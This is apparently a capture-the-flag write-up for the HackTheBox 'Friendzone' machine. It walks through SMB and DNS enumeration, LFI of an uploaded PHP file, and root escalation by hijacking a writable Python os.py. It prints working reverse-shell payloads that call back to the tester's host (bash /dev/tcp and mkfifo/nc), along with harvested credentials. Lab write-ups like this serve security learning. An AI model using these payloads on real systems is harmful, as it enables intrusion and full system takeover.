Friendzone

Tags: #Linux #Enumeration #LFI #SMB #DNS #CronAbuse #PathHijacking

Friendzone is an easy-rated Linux machine from HackTheBox, created by Creator askar. In the current post, my IP is 10.10.14.24, and the target IP is 10.129.191.183.

Friendzone is like those easy boxes that are challenging. At the start, it has a lot of noise and rabbit holes, wasting your time. The good thing about this machine, is it's a mix of many techniques and stuff, checking SMB, doing an LFI, inject a php file, etc. It's a funny machine.

Gathering Information

The first steps are about getting basic information about the target, by using nmap and searching information from the website.

Local Terminal

$ ping -c 1 10.129.191.183

Pinging 10.129.191.183 with 32 bytes of data:
Reply from 10.129.191.183: bytes=32 time=176ms TTL=63
Reply from 10.129.191.183: bytes=32 time=188ms TTL=63
Reply from 10.129.191.183: bytes=32 time=233ms TTL=63
Reply from 10.129.191.183: bytes=32 time=168ms TTL=63

Ping statistics for 10.129.191.183:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 168ms, Maximum = 233ms, Average = 191ms

By the TTL, we can assume that is a Linux Machine.

Local Terminal

$nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.191.183 --oG Ports

Nmap scan report for 10.129.191.183
Host is up, received echo-reply ttl 63 (0.79s latency).
Scanned at 2023-05-24 09:42:09 Pacific SA Standard Time for 25s
Not shown: 39993 closed tcp ports (reset), 25535 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE      REASON
21/tcp  open  ftp          syn-ack ttl 63
22/tcp  open  ssh          syn-ack ttl 63
53/tcp  open  domain       syn-ack ttl 63
80/tcp  open  http         syn-ack ttl 63
139/tcp open  netbios-ssn  syn-ack ttl 63
443/tcp open  https        syn-ack ttl 63
445/tcp open  microsoft-ds syn-ack ttl 63

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 25.41 seconds
           Raw packets sent: 106042 (4.666MB) | Rcvd: 42746 (1.710MB)

Local Terminal

$ nmap -sC -sV -p 21,22,53,80,139,443,445 10.129.191.183 -oN Target

Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-24 09:44 Pacific SA Standard Time
Nmap scan report for 10.129.191.183
Host is up (0.18s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Friend Zone Escape software
|_http-server-header: Apache/2.4.29 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.29 (Ubuntu)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2023-05-24T13:44:19
|_  start_date: N/A
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2023-05-24T16:44:20+03:00
|_clock-skew: mean: -59m58s, deviation: 1h43m54s, median: 0s

It has the FTP port 21 service working, we are going to check if has the user anonymous

Local Terminal

$ ftp 10.129.191.183

Connected to 10.129.191.183.
220 (vsFTPd 3.0.3)
Name (10.129.191.183:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed

It doesn't work, and the services https at the port 443, can provide information by using the command openSSL

Local Terminal

$ openssl s_client -connect 10.129.191.183:443

CONNECTED(00000003)
Cant use SSL_get_servername
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
verify error:num=18:self-signed certificate
verify return:1
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
verify error:num=10:certificate has expired
notAfter=Nov  4 21:02:30 2018 GMT
verify return:1
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
notAfter=Nov  4 21:02:30 2018 GMT
verify return:1
---
Certificate chain
 0 s:C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
   i:C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: Oct  5 21:02:30 2018 GMT; NotAfter: Nov  4 21:02:30 2018 GMT
---
Server certificate
-----BEGIN CERTIFICATE-----
<...> # Innecesary information
-----END CERTIFICATE-----
subject=C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
issuer=C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1677 bytes and written 386 bytes
Verification error: certificate has expired
---
New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES256-GCM-SHA384
    Session-ID: 9463F6CBBB0671B5500A84FB494E988FAB498146CC26C50C15A05DC344B6847D
    Session-ID-ctx:
    Master-Key: 673175AB9328562B2F24180E4CEE79BBDF47F65472CA8EB708499ACB0A26903A38524E095BFBD51339B4056350435CE3
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:
    <...> #Innecesary info
    Start Time: 1684937022
    Timeout   : 7200 (sec)
    Verify return code: 10 (certificate has expired)
    Extended master secret: yes
---

There is an email (haha@friendzone.red) and a domain (CN = friendzone.red), to avoid public IPs, we need to add it to /etc/hosts

Local Terminal

echo "10.129.191.183 friendzone.red" >> /etc/hosts

Local Terminal

echo "10.129.191.183 friendzone.red" >> /mnt/c/Windows/System32/drivers/etc/hosts

Now, we are going to get information using whatweb to view the Content Manager

Local Terminal

$ whatweb http://friendzone.red/

http://friendzone.red/ [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], 
Email[info@friendzoneportal.red], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], 
IP[10.129.191.183], Title[Friend Zone Escape software]

New email added {info@friendzoneportal.red} and thanks to it, another domain {friendzoneportal.red}, remember to add it in /etc/hosts. If you are using Windows, use vi C:\Windows\System32\drivers\etc\hosts

• Browser: http://10.129.191.183

At first sight, there is nothing, let's check with CTLR+U

• Browser: https://10.129.181.183

It looks like a dead end, but still, we have two domains to test,

• Browser: https://friendzone.red

There is a hint in this image, let's go to https://friendzone.red/js/js

It changes always, uses base64, but if you decode that you will get nothing.

So, we got nothing, let's check the nmap information again and test with other channels.

Local Terminal

$ smbclient -L 10.129.191.183 -N

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        Files           Disk      FriendZone Samba Server Files /etc/Files
        general         Disk      FriendZone Samba Server Files
        Development     Disk      FriendZone Samba Server Files
        IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

Local Terminal

$ smbmap -H 10.129.191.183
[+] Guest session       IP: 10.129.191.183:445  Name: friendzone.red
        Disk              Permissions     Comment
        ----              -----------     -------
        print$            NO ACCESS       Printer Drivers
        Files             NO ACCESS       FriendZone Samba Server Files /etc/Files
        general           READ ONLY       FriendZone Samba Server Files
        Development       READ, WRITE     FriendZone Samba Server Files
        IPC$              NO ACCESS       IPC Service (FriendZone server (Samba, Ubuntu))

The important information comes from the disk with permissions.

Local Terminal

$ smbclient  //10.129.191.183/general -N

Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jan 16 17:10:51 2019
  ..                                  D        0  Tue Sep 13 11:56:24 2022
  creds.txt                           N       57  Tue Oct  9 20:52:42 2018
                3545824 blocks of size 1024. 1651340 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

Go where you downloaded the creds.txt files and read the document

Local Terminal

$ cat creds.txt

creds for the admin THING:
admin:WORKWORKHhallelujah@#

Local Terminal

$ smbmap -H 10.129.191.183 -u 'admin' -p 'WORKWORKHhallelujah@#'

[+] Guest session       IP: 10.129.191.183:445  Name: friendzone.red
        Disk            Permissions     Comment
        ----            -----------     -------
        print$          NO ACCESS       Printer Drivers
        Files           NO ACCESS       FriendZone Samba Server Files /etc/Files
        general         READ ONLY       FriendZone Samba Server Files
        Development     READ, WRITE     FriendZone Samba Server Files
        IPC$            NO ACCESS       IPC Service (FriendZone server (Samba, Ubuntu))

Valid, but nothing change

Now, we are going to abuse to the service at the port 53, to make a Zone Transference Attack.

Local Terminal

$ dig +short ns friendzone.red

ns2.hostresolver.com.
ns1.hostresolver.com.

Local Terminal

$ dig axfr friendzone.red @ns1.hostresolver.com.

# Some writeups says that this should work, but for some reason I want use axfr scan.
# You should find: https://administrator1.friendzone.red/

Local Terminal

echo "10.129.191.183 administrator1.friendzone.red" >> /etc/hosts
echo "10.129.191.183 administrator1.friendzone.red" >> /mnt/c/Windows/System32/drivers/etc/hosts

• Browser: https://administrator1.friendzone.red/

Login with the credentials admin:WORKWORKHhallelujah@#

• Browser: https://administrator1.friendzone.red/dashboard.php

• Browser: https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

We can see that the website respond to the parameter timestamp, by adding a .php at the end. Thanks to SMB we find a folder called Development that we can read and write, this sounds weird but there is a chance that by creating a file and test something will happen.

Local Terminal

$ vi test.php

test.php

<?php
    echo "Hello, this is a test";
    system("whoami");
?>

Local Terminal

$ smbclient //10.129.191.183/Development -N

$ put test.php

$ exit

• Browser: https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../../../../../../etc/Development/test

It works!

Ok, with this information at our hand, we know that we can create a reverse shell

Local Terminal

$ vi reverse.php

reverse.php

<?php
    system("bash -c 'bash -i >& /dev/tcp/10.10.14.24/443 0>&1'");
?>

Local Terminal

$ smbclient //10.129.191.183/Development -N

$ put reverse.php

$ exit

Local Terminal

$ rlwrap nc -nlvp 443

Now to work better, you need to do a Bash Upgrade.

Local Terminal

www-data@FriendZone:/var/www/admin$ ls
dashboard.php  images  index.html  login.php  timestamp.php

www-data@FriendZone:/var/www/admin$ cd ..

www-data@FriendZone:/var/www$ ls
admin  friendzone  friendzoneportal  friendzoneportaladmin  html  mysql_data.conf  uploads

Always, configuration files like "mysql_data.conf" are worth to check

Target Terminal [www-data]

www-data@FriendZone:/var/www$ cat mysql_data.conf

for development process this is the mysql creds for user friend

db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ

Credentials in plain text!

Target Terminal [www-data]

www-data@FriendZone:/var/www$ su friend
Password:       #Try: Agpyu12!0.213$

And it works.

[Friend]

Target Terminal [Friend]

cat /home/friend/user.txt
2600be66938148dc65125e3e58a9fbb4

Privileges Escalation

While looking around the target, I found an interesting file in /opt/server_admin/

Local Terminal

# Download pspy64 from https://github.com/DominicBreuker/pspy
python3 -m http.server 80

Target Terminal [Friend]

$ cd /tmp
$ wget http://10.10.14.24/pspy64
$ chmod 777 pspy64
$ ./pspy64

<...>
2023/05/25 00:09:04 CMD: UID=0     PID=3259   | /bin/sh -e /usr/lib/php/sessionclean
2023/05/25 00:09:04 CMD: UID=0     PID=3260   | /bin/sh -e /usr/lib/php/sessionclean
2023/05/25 00:09:04 CMD: UID=0     PID=3261   | /bin/sh -e /usr/lib/php/sessionclean
2023/05/25 00:09:04 CMD: UID=0     PID=3262   | /bin/sh -e /usr/lib/php/sessionclean
2023/05/25 00:09:04 CMD: UID=0     PID=3265   |
2023/05/25 00:10:01 CMD: UID=0     PID=3268   | /bin/sh -c /opt/server_admin/reporter.py
2023/05/25 00:10:01 CMD: UID=0     PID=3267   | /bin/sh -c /opt/server_admin/reporter.py
2023/05/25 00:10:01 CMD: UID=0     PID=3266   | /usr/sbin/CRON -f
<...>

Target Terminal [Friend]

cat reporter.py

reporter.py

#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

Target Terminal [Friend]

friend@FriendZone:/opt/server_admin$ ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15  2019 /usr/lib/python2.7/os.py

# Or you can try "find -type f -writable -ls" (From "0xdf hacks stuff")

As you can see, the package "os" is executed from python and by root and we have write permission.

Local Terminal

$ nc -nlvp 444

Target Terminal [Friend]

echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 10.10.14.24 444 >/tmp/f')" >> /usr/lib/python2.7/os.py

And now wait until the task reporter.py runs again.

Target Terminal [Root]

$ cat /root/root.txt
b344a6bb6a825d4352df233dd8ffd6fc